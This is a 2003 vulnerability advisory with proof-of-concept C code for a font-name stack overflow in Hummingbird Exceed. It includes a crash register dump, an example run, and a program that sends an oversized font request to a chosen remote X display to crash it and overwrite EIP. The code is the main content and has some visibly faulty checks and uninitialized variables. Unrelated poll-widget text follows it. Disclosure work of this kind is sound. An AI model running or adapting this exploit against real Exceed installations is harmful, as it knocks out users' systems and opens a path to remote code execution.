2

*****************************************************************************

$ An open security advisory #2 - Hummingbird Exceed (All Versions) POC Code

***************************************************************************

1: Bug Researcher: c0ntex@hushmail.com

2: Bug Released: August 2003

3: Bug Impact Rate: Medium / Hi

4: Bug Scope Rate: Remote / Local

****************************************************************************

****************************************************************************

HQOTD: "How secure do you want it"

http://mimage.hummingbird.com/alt_content/binary/pdf/collateral/ds/exceed_ds_en.pdf

I'll tell you: Much more please sirs.

**************************************

Exceed has some bugs caused by the way it handles fonts in a local and remote context.

By requesting the use of a font from an Exceed database, providing the font name is

either longer than the defined buffer or the font has been prepared as hostile code,

a stack based overflow will occur. This will allow the execution of external commands

on the vulnerable system.

Obviously it's possible to cause a denial of service (DOS) attack on a machine running

Exceed too.

By sending an X Term window or any other X application to Exceed, loading a large font

name or creating a large window title, we can corrupt the stack and cause Exceed to

crash.

Windows Stack Trace:

--------------------

EAX = C0000000

EBX = 00000000

ECX = 40000000

EDX = 00000501

ESI = 41414141

EDI = 0012E138

EIP = 41414141

ESP = 0012E0C8

EBP = 0012E0F0

[-] We can crash a local Exceed server * 2

[-] We can crash a remote Exceed server * many

[-] We can crash Exceed client * many

[-] We can write over EIP address * many

See the POC code below for more information.

Example Run:

------------

[c0ntex@darkside exceed]$ gcc -o exceed exceed.c -lX11 -L /usr/X11R6/lib

[c0ntex@darkside exceed]$ ./exceed exploited:0.0

[-] Exceed [ALL] EIP Attack - c0ntex@hushmail.com

[-] We are using DISPLAY variable: exploited:0.0

[-] Hang on to your feathers, sending some buffer

..

XIO: fatal IO error 104 (Connection reset by peer) on X server "exploited:0.0"

after 11 requests (9 known processed) with 0 events remaining.

Remote Font Server:

-------------------

If you find that you use remote font servers with Exceed, a way to check that the server

is not trying to exploit your PC could be:

$ xlsfonts -display exceed_server:0.0

--------0------

--arial-bold-r---0-0-120-120-p-0-iso8859-1

--arial-medium-r---0-0-120-120-p-0-iso8859-1

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.... <-- Here is evil font

...

******************************************************************************************************************

$ Hummingbird informed 3 weeks ago, still no reply.

$ Work around: Uninstall Exceed until a patch has been released.

******************************************************************************************************************

*/

#include

#include

#include

#include

#include

#define BIGBIRD 6001

#define DIRTY_VAL 69

#define MAX_BORDER_LEN 3

#define WIN_TIMER 5

#define WIN_TITLE "simple PoC window - lets shoot birds"

typedef char Birds;

int main(int argc, char *argv[])

{

Birds nests[BIGBIRD];

Birds egg[2] = { 'A', '\0' };

Birds *feathersN;

Birds *HABITAT = "DISPLAY";

unsigned short eggs, chicks;

unsigned short winW, winH, feathersW, feathersH;

unsigned long locX, locY;

unsigned long winBDR;

Display* feathers;

Window wingspan;

XFontStruct* birdcull;

fprintf(stderr, "\n\n[-] Exceed [ALL] EIP Attack - c0ntex@hushmail.com\n");

if(argc < 2) {

fprintf(stderr, "[-] Please set IP/Hostname for DISPLAY pointer!\n");

fprintf(stderr, "[-] Usage: %s \n\n", argv[0]);

return EXIT_FAILURE;

}

if(setenv(HABITAT, argv[1], 1) <0) { /*;p*/

perror("setenv"); return EXIT_FAILURE;

}

fprintf(stderr, "[-] Ok, using DISPLAY variable: %s\n", argv[1]);

for(eggs = 0; eggs < BIGBIRD -1; eggs++)

if(strncat(nests, egg, sizeof(BIGBIRD)-1) == NULL) {

perror("strncat"); return EXIT_FAILURE;

}

if((feathers = XOpenDisplay(feathersN)) == NULL) {

perror("XOpenDisplay"); return EXIT_FAILURE;

}

chicks = DefaultScreen(feathers);

winW = ((feathersW = DisplayWidth(feathers, chicks)) /3);

winH = ((feathersH = DisplayHeight(feathers, chicks)) /3);

locX = DIRTY_VAL; locY = DIRTY_VAL; winBDR = MAX_BORDER_LEN;

wingspan = XCreateSimpleWindow(feathers, RootWindow(feathers, chicks),

locX, locY, winW, winH, winBDR,

BlackPixel(feathers, chicks),

WhitePixel(feathers, chicks));

if(XCreateSimpleWindow == NULL) {

perror("XCreateSimpleWindow"); return EXIT_FAILURE;

}

XStoreName(feathers, wingspan, WIN_TITLE);

if(XStoreName == NULL) {

perror("XOpenDisplay"); return EXIT_FAILURE;

}

XMapWindow(feathers, wingspan);

if(XMapWindow == NULL) {

perror("XOpenDisplay"); return EXIT_FAILURE;

}

fprintf(stderr, "[-] Hang on to your feathers, sending some buffer \n\n");

if((birdcull = XLoadQueryFont(feathers, nests)) == NULL) {

perror("XLoadQueryFont"); return EXIT_FAILURE;

}

XCloseDisplay(feathers);

return EXIT_SUCCESS;

}


Ведете ли вы блог?

Да
Нет
Планирую


Результаты опроса

Новостной блок